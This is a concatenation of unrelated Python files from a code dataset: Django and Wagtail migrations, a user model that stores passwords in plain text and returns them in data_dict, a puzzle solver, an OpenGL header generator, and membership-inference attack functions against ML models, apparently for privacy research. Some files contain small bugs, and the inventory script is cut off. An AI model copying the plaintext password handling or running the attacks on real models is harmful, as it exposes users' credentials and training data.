content
stringlengths 5
1.05M
|
|---|
from celery import Celery
from flask import render_template
from flask_mail import Message
import celery_conf
app = Celery(__name__)
#从配置文件拿到celery的配置文件
app.config_from_object(celery_conf)
# @app.tasks
# def send_email(reciver,url,u_id,mail, cache):
#
# msg = Message("欢迎注册爱鲜蜂后台管理",
# [reciver],
# sender="1395947683"
# )
# msg.html = render_template("active.html",url=url)
# mail.send(msg)
# #拼接
# key = url.split("/")[-1]
# cache.set(key,u_id,time_out=60*60)
|
"""Contains the schemas for the tables in the database.
"""
from . import engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Boolean
Base = declarative_base()
class User(Base):
"""Represents the contents of the user table.
"""
__tablename__ = "user"
uuid = Column(String, primary_key=True)
username = Column(String)
email = Column(String)
password = Column(String)
is_active = Column(Boolean, default=True)
@property
def data_dict(self):
return {
"uuid": self.uuid,
"username": self.username,
"email": self.email,
"password": self.password,
"is_active": self.is_active,
}
def initializeDatabase():
"""Makes the database usable by creating all of the tables.
"""
Base.metadata.create_all(engine.engine)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-12 18:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtailstreamfieldforms.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0040_page_draft_title'),
]
operations = [
migrations.CreateModel(
name='HomePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('author', models.CharField(max_length=255)),
('date', models.DateField(verbose_name='Post Date')),
('body', wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='heading')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('singlelinefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_value', wagtail.core.blocks.CharBlock(required=False))))), ('multilinefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_value', wagtail.core.blocks.CharBlock(required=False))))), ('numberfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('emailfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('urlfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('checkboxfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_checked', wagtail.core.blocks.BooleanBlock(default=False, required=False))))), ('dropdownfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('choices', wagtail.core.blocks.ListBlock(wagtailstreamfieldforms.blocks.FieldChoiceBlock)), ('allow_multiple_selections', wagtail.core.blocks.BooleanBlock(default=False, required=False))))), ('radiofield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('choices', wagtail.core.blocks.ListBlock(wagtailstreamfieldforms.blocks.FieldChoiceBlock))))), ('datefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('datetimefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)))))))),
('submit_label', models.CharField(default='Submit', max_length=255)),
('submitted_body', wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='heading')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
|
# count valid passwords according to company policy:
# i.e. given a list of strings in the form "policy char: password"
# does the password contain a number of the characters char that fall within the bounds of the policy
# for example:
# 1-3 a: abcde is *valid* because the password contains 1 'a' (between 1 and 3)
# 1-3 b: cdefg is *invalid* because the password contains 0 b's (not between 1 and 3)
# 2-9 c: ccccccccc is *valid* because the password contains 9 'c's (between 2 and 9)
# Part b:
# does the password contain char at either position of the policy (and not at both positions)
# note: policy indices are 1-based, not 0-based
# for example:
# 1-3 a: abcde is *valid* because 'a' exists at index 1 and not at index 3
# 1-3 b: cdefg is *invalid* because 'b' does not exist at index 1 or 3
# 2-9 c: ccccccccc is *invalid* because 'c' exists at both indices 2 and 9
# ---- Part a: O(lines * len(password)) time complexity / constant O(1) space complexity ----
# ---- Part b: linear O(n) time complexity / constant O(1) space complexity ----
def validate(lines, part):
count = 0
for line in lines:
# unpack space-separated components
rule, letter, pw = line.split()
# unpack bounds from rule
lower, upper = map(int, rule.split('-'))
if part == 'a':
# count if the number of char falls in the bounds
count += lower <= pw.count(letter[0]) <= upper
else:
# count if either position (1-indexed) contains letter, but not both (xor)
count += (pw[lower-1] == letter[0]) ^ (pw[upper-1] == letter[0])
return count
if __name__ == '__main__':
lines = [line for line in open('day2.txt')]
print(f"Part a: found {validate(lines, 'a')} valid passwords of {len(lines)}")
print(f"Part b: found {validate(lines, 'b')} valid passwords of {len(lines)}")
|
import os
from pint import UnitRegistry
# load up the registry to be used everywhere
ureg = UnitRegistry()
# add currency as a type of unit since it is not part of the default
ureg.define('usd = [currency]')
Q_ = ureg.Quantity
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
CREDIT = "CREDIT"
CHECKING = "CHECKING"
VALID_ACCT_TYPES = [CREDIT,CHECKING]
FOREVER_RECURRING = "recurring payment like forever"
# FOR BOKEH PLOTS
TOOLTIPS = [
("(x,y)", "($x, $y)"),
]
|
from sqlalchemy import (create_engine, Column, Integer, MetaData,
select, String, Table)
meta = MetaData()
artists = Table('artists', meta,
Column('ArtistId', Integer, primary_key=True),
Column('Name', String)
)
DATABASE_FILE = 'sqlalchemy.db'
db = create_engine('sqlite:///{}'.format(DATABASE_FILE))
# Create tables
artists.create(db)
conn = db.connect()
conn.execute(artists.insert(), [
{'Name': 'AC/DC'},
{'Name': 'Led Zeppelin'}
])
stmt = select([artists])
conn.execute(stmt).fetchall()
# Drop tables
artists.drop(db)
|
from typing import Union, List, Callable, Any, Iterable
from collections import OrderedDict
from .interact_in import InteractIn
from .interact_out import InteractOut
from ..defaults import INTERACT_SUBDOMAIN
class BaseInteract:
def __init__(self):
self.id = None
self.inputs_args = None
self.inputs_kwargs = None
self.output_dict = None
self.api_point = None
self.processor = None
class Interact:
"""Interact class stores, reports, and chains interaction functions
:example:
Interact(InteractIn(html_input_element),
InteractOut(dom_output_element),
update_ouput_div
)
Interact(InteractIn(inp.id, "value", key="key_word_name"),
InteractOut(ouput.id, "content"),
update_ouput_div
)
def update_output_div(key_word_name=None):
pass
DESIGN QUESTION:
- ABLE TO CHAIN INTERACT OBJECT?
- POSSIBLE TO DO CHANGE-SENSITIVE INPUTS?
- update chains and objects before receiving from api
"""
# keep track of all ids
interact_ids = set()
def __init__(
self,
input: Union[InteractIn, List[InteractIn]],
output: Union[InteractOut, List[InteractOut]],
func: Callable[..., Any],
):
# Interaction ID
# Make it easy for the client to refer and retrieve
self.id = self.generate_id(interact_ids=self.interact_ids)
# Store all input items. For rendering.
self.inputs = []
# COMPILED UNPON REQUEST
# This is will compiled upon request from inputs_args_name
# lazy loading: pass to function
# :Example: func(*inputs_args)
self.inputs_args = []
# Store the func arg names in order
# this method is preferred as intropsection allows easier debugging
# arg name's convention : id_attribute-name
# :Example: [id1_attr1, id2_attr2]
self.inputs_args_names = []
# dictionary of argname-value pair for fast update
# :Example: {id1_attr1: value, id2_attr2: value}
self.values_dict = {}
# COMPILED UNPON REQUEST
# dictionary of kwargs that will be compiled upon request
# pass to function
# func(**inputs_kwargs)
self.inputs_kwargs = {}
# dictionary of kwargs-arg-name pair
# :Example: {kwarg_name: arg_name}
self.inputs_kwargs_names = {}
# INPUT VARIABLES
# input will take either a list or an input object
# from each input element, need to get id, attribute and value
# :namespace: id_html-attribute
self.__input_name_space = "{identity}_{attribute}"
# convert it into a list to make code cleaner
# don't need to separate method of handling single obj or list
input = [input] if not isinstance(input, list) else input
# TODO: use builder pattern for this
if isinstance(input, list):
for i in input:
if isinstance(i, InteractIn):
# Interact_In should be in charge of making sure
# that id, attribute and value are ready to be used
if i.identity and i.attribute:
name_space = self.__input_name_space.format(
identity=i.identity, attribute=i.attribute
)
self.inputs.append(i)
if hasattr(i, "value"):
if not i.key:
# store in order
self.inputs_args_names.append(name_space)
else:
# store with keyword
self.inputs_kwargs_names[i.key] = name_space
self.values_dict[name_space] = i.value
else:
raise TypeError(f"{i} {type(i)} need to be of type: InteractIn")
# OUTPUT VARIABLES
# Store all output elements. For rendering.
self.outputs = []
# Output information
# :Example: ouput = {"id_123": {attribute:"figure", type:"Graph", data:{} }, ...}
# output should also be in order
# output should also support dictionary mapping to id
self.output_dict = OrderedDict()
self.output_format = ["attribute", "dom_type", "data"]
# PROCESS OUTPUT
output = [output] if not isinstance(output, list) else output
if isinstance(output, list):
for j in output:
if isinstance(j, InteractOut):
# NOTE: Should we generate initial output value from the current input values?
# Option to trigger process later after function is collected
if j.identity and j.attribute:
self.output_dict[j.identity] = {
self.output_format[0]: j.attribute,
self.output_format[1]: j.dom_type,
self.output_format[2]: None,
}
self.outputs.append(j)
else:
raise TypeError(f"{j} {type(j)} need to be of type: InteractOut")
# CALLBACK
# function chain should be in order
# NOTE FUTURE: Able to use class and not just function?
self.function_chain = []
if callable(func):
self.processor = func
# should check if input matches output
self.function_chain.append(func)
# GENERATE API
# api name format will be used a api url
# it must be unique, and should be informative
# NOTE: comply with url naming convention ?
# TO LET USERS CHANGE THIS IN DEFAULT
self.api_subdomain = INTERACT_SUBDOMAIN
__api_name_format = "{id}"
__required_names = {"id": self.id}
self.api_point = self._generate_api_point(
__api_name_format,
self.api_subdomain,
additional_parameters=__required_names,
)
""" ID METHODS
"""
def generate_id(
self, *, curr_tries: int = 1, max_tries: int = 10, interact_ids: set = None
) -> int:
# id generator for Interact Object
# uses cls.interact_ids to keep track
interact_ids = interact_ids if interact_ids else self.interact_ids
if curr_tries > max_tries:
raise Exception("Unable to generate id for Interact object.")
if len(interact_ids) == 0:
return 0
new_id = list(interact_ids)[:-1] + curr_tries
if new_id not in interact_ids:
interact_ids.add(new_id)
return new_id
elif curr_tries <= max_tries:
curr_tries += 1
self.generate_id(curr_tries=curr_tries, interact_ids=interact_ids)
""" API METHODS
"""
def _generate_api_point(
self, name_format: str, subdomain: str, additional_parameters: list = None
):
api_point = (
"/" + subdomain + "/" + name_format.format(id=additional_parameters["id"])
)
return api_point
""" CHAIN METHODS
"""
def chain_calls(self, function_chain: list):
# TODO: Given a list of functions, pass output to input
# for x in function_chain:
pass
""" PROPERTY METHODS
"""
@property
def inputs_args(self):
return self.__compile_args(self.inputs_args_names, self.values_dict)
@inputs_args.setter
def inputs_args(self, values: list):
if isinstance(values, list):
return values
@property
def inputs_kwargs(self):
return self.__compile_kwargs(self.inputs_kwargs_names, self.values_dict)
@inputs_kwargs.setter
def inputs_kwargs(self, values: dict):
if isinstance(values, dict):
return values
def __compile_args(self, inputs_args_names: list, values_dict: dict):
# lazy loading of arguments
# NOTE: how to keep track of changes? Possible?
compiled_list = []
for name in inputs_args_names:
compiled_list.append(values_dict[name])
return compiled_list
def __compile_kwargs(self, inputs_kwargs_names: dict, values_dict: dict):
# lazy loading of keyword arguments
# NOTE: how to keep track of changes? Possible?
compiled_dict = {}
for key, name in inputs_kwargs_names.items():
compiled_dict[key] = values_dict[name]
return compiled_dict
""" UPDATE METHODS
"""
def _update_single_input(self, id, attribute, new_value, values_dict=None):
i = {"identity": id, "attribute": attribute}
search_key = self.__input_name_space.format(
identity=i["identity"], attribute=i["attribute"]
)
values_dict = values_dict if values_dict else self.values_dict
if values_dict.get(search_key, None):
values_dict[search_key] = new_value
return True
else:
raise KeyError(
f"{search_key} cannot be found in Interact input values vault"
)
def update(self, json_data: dict):
# Template method
# propose update prodcess
# json_data will be a dictionary or list of htmlelement information
# NOTE: request data should be in dict form.
# Container should be in charge of compiling it into a generic format
# 1. get json put request data
# NOTE FORMAT should be in dict form
# :Example: {index: {"id":id, "attribute":attr, "value":val}}
if isinstance(json_data, dict):
for o in json_data.values():
self._update_single_input(o["id"], o["attribute"], o["value"])
return True
return False
""" OUTPUT METHODS
"""
def process(self):
# NOTE: template function that the client will be using
arg_list = self.inputs_args
kwargs_dict = self.inputs_kwargs
processor = self.processor
outputs_dict = self.output_dict
outputs_dict = self._process(arg_list, kwargs_dict, outputs_dict, processor)
return outputs_dict
def _process_inputs(self, inputs_args: Iterable, inputs_kwargs: dict, processor):
# This is the main processing method
# compile
if len(inputs_args) or len(inputs_kwargs):
result = processor(*inputs_args, **inputs_kwargs)
# TODO: how do I handle multiple outputs of diff. type?
# it should be able to accept list or tuple
# what about dictonary?
if isinstance(result, (list, tuple, set, dict)):
return result
else:
return [result]
def _update_outputs(self, results, outputs: List[dict]) -> List[dict]:
# UPDATE
# update each output in the order of specification
for id, idx in zip(outputs, range(len(outputs))):
outputs[id]["data"] = results[idx]
return outputs
def _process(
self,
arg_list: list,
kwargs_dict: dict,
outputs: List[dict],
processor: Callable,
):
# NOTE: main process controller
# process inputs with function and updates output datas
# PROCESSS
if self.processor:
results = self._process_inputs(arg_list, kwargs_dict, processor)
# TODO: where should i check that function
# return the same no. of outputs?
if results and len(results) == len(outputs):
# UPDATE
return self._update_outputs(results, outputs)
else:
raise Exception(
f"No. of outputs {len(outputs)} doesn't match the return of {len(results)} results"
)
else:
raise Exception("Requires a processing function.")
""" HTTP METHODS
"""
def http_response(self, request_method, request_data, request):
if request_method == "POST":
response = self._post_response(request_data, request)
elif request_method == "PUT":
response = self._put_response(request)
elif request_method == "GET":
response = self._get_response(request_data)
else:
raise Exception("Invalid HTTP request")
return response
def _post_response(self, request_data, request):
# should be the same as put
self._put_response(request_data)
def _put_response(self, request):
request_data = request.get_json()
# 1. Update values
if self.update(request_data):
# if update successfully, process and return output vales
response_dict = self.process()
return response_dict
else:
# TODO: flask need to implement error handler
raise Exception("Unable to update data")
def _get_response(self, request_data):
response_dict = self.process()
if response_dict:
return response_dict
raise Exception("Unable to get output results")
""" JSON METHODS
"""
def render(self):
# NOTE: non-functional; uses global variables
# this is only used for setting up the interaction on client-side
inputs_dict = {}
outputs_dict = {}
for i, element in enumerate(self.inputs):
# NOTE: right now we are getting it from InteractIn objects
# shouldn't we get it from interact storage instead?
inputs_dict[i] = {
"id": element.identity,
"dom_type": element.dom_type,
"attribute": element.attribute,
}
for i, element in enumerate(self.outputs):
outputs_dict[i] = {
"id": element.identity,
"dom_type": element.dom_type,
"attribute": element.attribute,
}
render_format = {
"input": inputs_dict,
"output": outputs_dict,
"api_point": self.api_point,
}
return render_format
|
#!/usr/bin/env python3
"""
License statement applies to this file (glgen.py) only.
"""
"""
Permission is hereby granted, free of charge,
to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import os
import re
banned_ext = [ 'AMD', 'APPLE', 'NV', 'NVX', 'ATI', '3DLABS', 'SUN', 'SGI', 'SGIX', 'SGIS', 'INTEL', '3DFX', 'IBM', 'MESA', 'GREMEDY', 'OML', 'PGI', 'I3D', 'INGL', 'MTX', 'QCOM', 'IMG', 'ANGLE', 'SUNX', 'INGR' ]
def noext(sym):
for ext in banned_ext:
if sym.endswith(ext):
return False
return True
def fix_multiline_functions(lines):
fixed_lines = []
temp_lines = []
for line in lines:
if line.count('(') > line.count(')'):
temp_lines.append(line)
else:
if len(temp_lines) > 0:
if line.count(')') > line.count('('):
temp_lines.append(line)
fixed_line = re.sub(' +',' ', ''.join(temp_lines).replace('\n','').replace('\t',''))
fixed_lines.append(fixed_line)
temp_lines = []
else:
temp_lines.append(line)
else:
fixed_lines.append(line)
return fixed_lines
def find_gl_symbols(lines):
typedefs = []
syms = []
for line in lines:
m = re.search(r'^typedef.+PFN(\S+)PROC.+$', line)
g = re.search(r'^.+(gl\S+)\W*\(.+\).*$', line)
if m and noext(m.group(1)):
typedefs.append(m.group(0).replace('PFN', 'RGLSYM').replace('GLDEBUGPROC', 'RGLGENGLDEBUGPROC'))
if g and noext(g.group(1)):
syms.append(g.group(1))
return (typedefs, syms)
def generate_defines(gl_syms):
res = []
for line in gl_syms:
res.append('#define {} __rglgen_{}'.format(line, line))
return res
def generate_declarations(gl_syms):
return ['RGLSYM' + x.upper() + 'PROC ' + '__rglgen_' + x + ';' for x in gl_syms]
def generate_macros(gl_syms):
return [' SYM(' + x.replace('gl', '') + '),' for x in gl_syms]
def dump(f, lines):
f.write('\n'.join(lines))
f.write('\n\n')
if __name__ == '__main__':
if len(sys.argv) > 4:
for banned in sys.argv[4:]:
banned_ext.append(banned)
with open(sys.argv[1], 'r') as f:
lines = fix_multiline_functions(f.readlines())
typedefs, syms = find_gl_symbols(lines)
overrides = generate_defines(syms)
declarations = generate_declarations(syms)
externs = ['extern ' + x for x in declarations]
macros = generate_macros(syms)
with open(sys.argv[2], 'w') as f:
f.write('#ifndef RGLGEN_DECL_H__\n')
f.write('#define RGLGEN_DECL_H__\n')
f.write('#ifdef __cplusplus\n')
f.write('extern "C" {\n')
f.write('#endif\n')
f.write('#ifdef GL_APIENTRY\n')
f.write('typedef void (GL_APIENTRY *RGLGENGLDEBUGPROC)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('typedef void (GL_APIENTRY *RGLGENGLDEBUGPROCKHR)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('#else\n')
f.write('#ifndef APIENTRY\n')
f.write('#define APIENTRY\n')
f.write('#endif\n')
f.write('#ifndef APIENTRYP\n')
f.write('#define APIENTRYP APIENTRY *\n')
f.write('#endif\n')
f.write('typedef void (APIENTRY *RGLGENGLDEBUGPROCARB)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('typedef void (APIENTRY *RGLGENGLDEBUGPROC)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('#endif\n')
f.write('#ifndef GL_OES_EGL_image\n')
f.write('typedef void *GLeglImageOES;\n')
f.write('#endif\n')
f.write('#if !defined(GL_OES_fixed_point) && !defined(HAVE_OPENGLES2)\n')
f.write('typedef GLint GLfixed;\n')
f.write('#endif\n')
f.write('#if defined(OSX) && !defined(MAC_OS_X_VERSION_10_7)\n')
f.write('typedef long long int GLint64;\n')
f.write('typedef unsigned long long int GLuint64;\n')
f.write('typedef unsigned long long int GLuint64EXT;\n')
f.write('typedef struct __GLsync *GLsync;\n')
f.write('#endif\n')
dump(f, typedefs)
dump(f, overrides)
dump(f, externs)
f.write('struct rglgen_sym_map { const char *sym; void *ptr; };\n')
f.write('extern const struct rglgen_sym_map rglgen_symbol_map[];\n')
f.write('#ifdef __cplusplus\n')
f.write('}\n')
f.write('#endif\n')
f.write('#endif\n')
with open(sys.argv[3], 'w') as f:
f.write('#include "glsym/glsym.h"\n')
f.write('#include <stddef.h>\n')
f.write('#define SYM(x) { "gl" #x, &(gl##x) }\n')
f.write('const struct rglgen_sym_map rglgen_symbol_map[] = {\n')
dump(f, macros)
f.write(' { NULL, NULL },\n')
f.write('};\n')
dump(f, declarations)
|
import torch.nn as nn
from torch.autograd import Variable
import torch
from immediate_sensitivity_primitives import grad_immediate_sensitivity
import numpy as np
# returns counts rather than counts over thresh
def merlin(model, inputs, labels, lf):
if type(inputs) == np.ndarray:
inputs = torch.from_numpy(inputs).float()
if type(labels) == np.ndarray:
lables = torch.from_numpy(labels).float()
sigma = .01
T = 100
loss_function = lf(reduction='none')
inp = Variable(inputs, requires_grad=False)
with torch.no_grad():
inp = inp.to(torch.cuda.current_device())
outputs = model.forward(inp)
labels = labels.to(torch.cuda.current_device())
loss = loss_function(torch.squeeze(outputs), torch.squeeze(labels))
counts = torch.zeros(len(loss)).to(torch.cuda.current_device())
for i in range(T):
with torch.no_grad():
noisy_inp = inp + (sigma * torch.randn(1, device=torch.cuda.current_device()))
noisy_outputs = model.forward(noisy_inp)
noisy_loss = loss_function(torch.squeeze(noisy_outputs), torch.squeeze(labels))
gt = noisy_loss > loss
counts += gt
return counts.cpu(), [float(l) for l in loss.cpu()]
def run_merlin(model, thresh, X_target, y_target, lf=nn.MSELoss):
counts, train_loss = merlin(model,
X_target,
y_target, lf)
pass_inf = counts > thresh
return sum(pass_inf) / len(pass_inf)
def merlin_optimal_thresh(model, train_loader, test_loader, lf=nn.MSELoss, num_batches=None, tpr = False):
train_bs = train_loader.batch_size
test_bs = test_loader.batch_size
if num_batches is None:
train_counts = np.zeros(len(train_loader.dataset))
test_counts = np.zeros(len(test_loader.dataset))
else:
train_counts = np.zeros(train_bs * num_batches)
test_counts = np.zeros(test_bs * num_batches)
for i, (inputs, labels) in enumerate(train_loader):
if num_batches is not None and i >= num_batches:
break
idx = i * train_bs
counts, _ = merlin(model, inputs, labels, lf)
train_counts[idx : (idx + len(labels))] = counts
for i, (inputs, labels) in enumerate(test_loader):
if num_batches is not None and i >= num_batches:
break
idx = i * test_bs
counts, _ = merlin(model, inputs, labels, lf)
test_counts[idx : (idx + len(labels))] = counts
max_thresh = 0
max_adv = 0
mtpr = 0
mfpr = 0
for i in range(0, 100):
train_pos = train_counts > i
test_pos = test_counts > i
train_rat = sum(train_pos)/len(train_pos)
test_rat = sum(test_pos)/len(test_pos)
adv = train_rat - test_rat
if adv > max_adv:
max_thresh = i
max_adv = adv
mtpr = train_rat
mfpr = test_rat
if tpr:
return max_adv, max_thresh, mtpr, mfpr
return max_adv, max_thresh
def run_merlin_loader(model, thresh, loader, lf=nn.MSELoss):
ratios = []
for inputs, labels in loader:
ratios.append(run_merlin(model, thresh, inputs, labels, lf))
torch.cuda.empty_cache()
return sum(ratios)/len(ratios)
def gaussian_pdf(sd, x):
if sd <= 0:
raise ValueError('standard deviation must be positive but is {}'.format(sd))
else: # sd > 0
return np.e ** (-0.5 * (x / sd) ** 2) / sd
def membership_inf(model, avg_train_loss, inputs, labels, lf=nn.MSELoss(reduction='none')):
inputs = inputs.to(torch.cuda.current_device())
outputs = model.forward(inputs)
labels = labels.to(torch.cuda.current_device())
loss = lf(torch.squeeze(outputs), labels)
loss = [l.item() for l in loss]
pass_inf = [1 if abs(l) < avg_train_loss else 0 for l in loss]
return pass_inf
def run_membership_inference_attack(model, avg_train_l, X_target, y_target, lf=nn.MSELoss(reduction='none')):
if type(X_target) == np.ndarray:
X_target = torch.from_numpy(X_target).float()
if type(y_target) == np.ndarray:
y_target = torch.from_numpy(y_target).float()
pass_inf = membership_inf(model,
avg_train_l,
X_target,
y_target, lf)
return sum(pass_inf)/len(pass_inf)
def run_yeom_loader(model, avg_train_l, loader, lf=nn.MSELoss, num_batches=None):
ratios = []
lf = lf(reduction='none')
with torch.no_grad():
for i, (inputs, labels) in enumerate(loader):
if (num_batches is not None) and i >= num_batches:
break
torch.cuda.empty_cache()
ratios.append(run_membership_inference_attack(model, avg_train_l, inputs, labels, lf))
return sum(ratios)/len(ratios)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-09-01 12:35
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Q
def update_caches(apps, schema_editor):
from wagtail_svgmap.models import ImageMap
for image_map in ImageMap.objects.filter(Q(_width_cache=0) | Q(_height_cache=0)).iterator():
image_map.recache_svg(save=True)
class Migration(migrations.Migration):
dependencies = [
('wagtail_svgmap', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='imagemap',
name='_height_cache',
field=models.FloatField(db_column='height_cache', default=0, editable=False),
),
migrations.AddField(
model_name='imagemap',
name='_width_cache',
field=models.FloatField(db_column='width_cache', default=0, editable=False),
),
migrations.RunPython(
update_caches,
reverse_code=migrations.RunPython.noop,
)
]
|
from discrete_world.space import infiniteTimeSpace
from discrete_world.mdp import infiniteTime
from utilities.counters import Timer
import matplotlib.pyplot as plt
from matplotlib import cm
import matplotlib as mpl
from matplotlib.colors import ListedColormap,LinearSegmentedColormap
from utilities.utilities import norm
import numpy as np
import torch as pt
from scipy.stats import poisson
class inventorySpace(infiniteTimeSpace):
"""
Implements the space class for the put option MDP
"""
def __init__(self, actions, states, dem_distr, M, f, c, h, K, _lambda, lambda_e_1=False):
self.dem_distr = dem_distr
self.M = M
self.QQ = dict()
self.pmf = dict()
self.cdf = dict()
self.A = actions
self.S = states
self.adm_A = NotImplemented
self.Q = NotImplemented
self.h = h
self.c = c
self.f = f
self.K = K
self._lambda = _lambda
self.O = dict()
self.F = dict()
self.rew = dict()
self.lambda_e_1 = lambda_e_1
self.build_distr()
self.build_admisible_actions()
self.build_kernel()
self.build_reward()
def build_admisible_actions(self):
"""
Builds the admisible actions function for the put MDP
"""
def adm_A(s):
return list(range(self.M - s + 1))
self.adm_A = adm_A
def build_kernel(self):
"""
Builds the stochastic kernel function for the put MDP
"""
def Q(s, a):
if (s, a) in self.QQ.keys():
return self.QQ[s, a]
else:
distr = np.zeros(shape=(1, len(self.S)))
distrdic = {}
for j_s, j in enumerate(self.S):
if self.M >= j > s + a:
distr[0][j] = 0
elif self.M >= s + a >= j > 0:
distr[0][j] = self.pmf[s + a - j]
distrdic[j_s] = distr[0][j]
else:
distr[0][j] = 1 - self.cdf[s + a - 1]
distrdic[j_s] = distr[0][j]
self.QQ[s, a] = distrdic
return distrdic
self.Q = Q
def build_distr(self):
for s in range(len(self.S)):
self.pmf[s] = self.dem_distr.pmf(s)
self.cdf[s] = self.dem_distr.cdf(s)
self.pmf[-1] = 0
self.cdf[-1] = 0
def reward(self, state, action=None):
"""
Reward function for the put option.
Parameters
----------
state:
state
action:
Action
Returns
-------
float
the reward for the given (state, action) tuple.
"""
return self.rew[state, action]
def build_reward(self):
for s in self.S:
self.F[s] = sum(self.f(j) * self.dem_distr.pmf(j) for j in range(s)) \
+ self.f(s) * (1 - self.dem_distr.cdf(s - 1))
for a in self.adm_A(s):
if a not in self.O.keys():
self.O[a] = (self.K + self.c(a)) * int(a != 0)
if s + a not in self.F.keys():
self.F[s + a] = sum(self.f(j) * self.dem_distr.pmf(j) for j in range(s + a)) \
+ self.f(s + a) * (1 - self.dem_distr.cdf(s + a - 1))
self.rew[s, a] = self.F[s + a] - self.O[a] - self.h(s + a)
if self.lambda_e_1:
self.rew[s, a] *= (1 - self._lambda)
def plot_f1():
inv_mdp = base_case()
v_VI = inv_mdp.iteration_counts['VI'].measures
v_JAC = inv_mdp.iteration_counts['JAC'].measures
v_GS = inv_mdp.iteration_counts['GS'].measures
y1 = [norm(v_VI - v) for v in V_VI]
y2 = [norm(v_JAC - v) for v in V_JAC]
y3 = [norm(v_GS - v) for v in V_GS]
x1 = range(len(y1))
x2 = range(len(y2))
x3 = range(len(y3))
plt.plot(x1, y1, label='Value iteration')
plt.plot(x2, y2, label='Jacobi')
plt.plot(x3, y3, label='Gauss-Seidel')
plt.legend()
plt.xlabel(r'$n$')
plt.ylabel(r'$||v^n -v^*_\lambda||$')
plt.show()
def base_case(log=False):
def f(s):
return 10 * s
def c(a):
return 2 * a
def h(s):
return s
inv_space = inventorySpace(actions=A, states=S, dem_distr=dem_distr, M=M, f=f, c=c, h=h, K=K, _lambda=_lambda)
inv_mdp = infiniteTime(inv_space, _lambda)
v_0 = pt.zeros((len(S), 1))
pol_VI, v_VI = inv_mdp.solve(v_0, 0.001, improvement_method='VI')
pol_JAC, v_JAC = inv_mdp.solve(v_0, 0.001, improvement_method='JAC')
pol_GS , v_GS = inv_mdp.solve(v_0, 0.001, improvement_method='GS')
if log:
t_GS = inv_mdp.computing_times['GS'].total_time
for i, t in inv_mdp.computing_times.items():
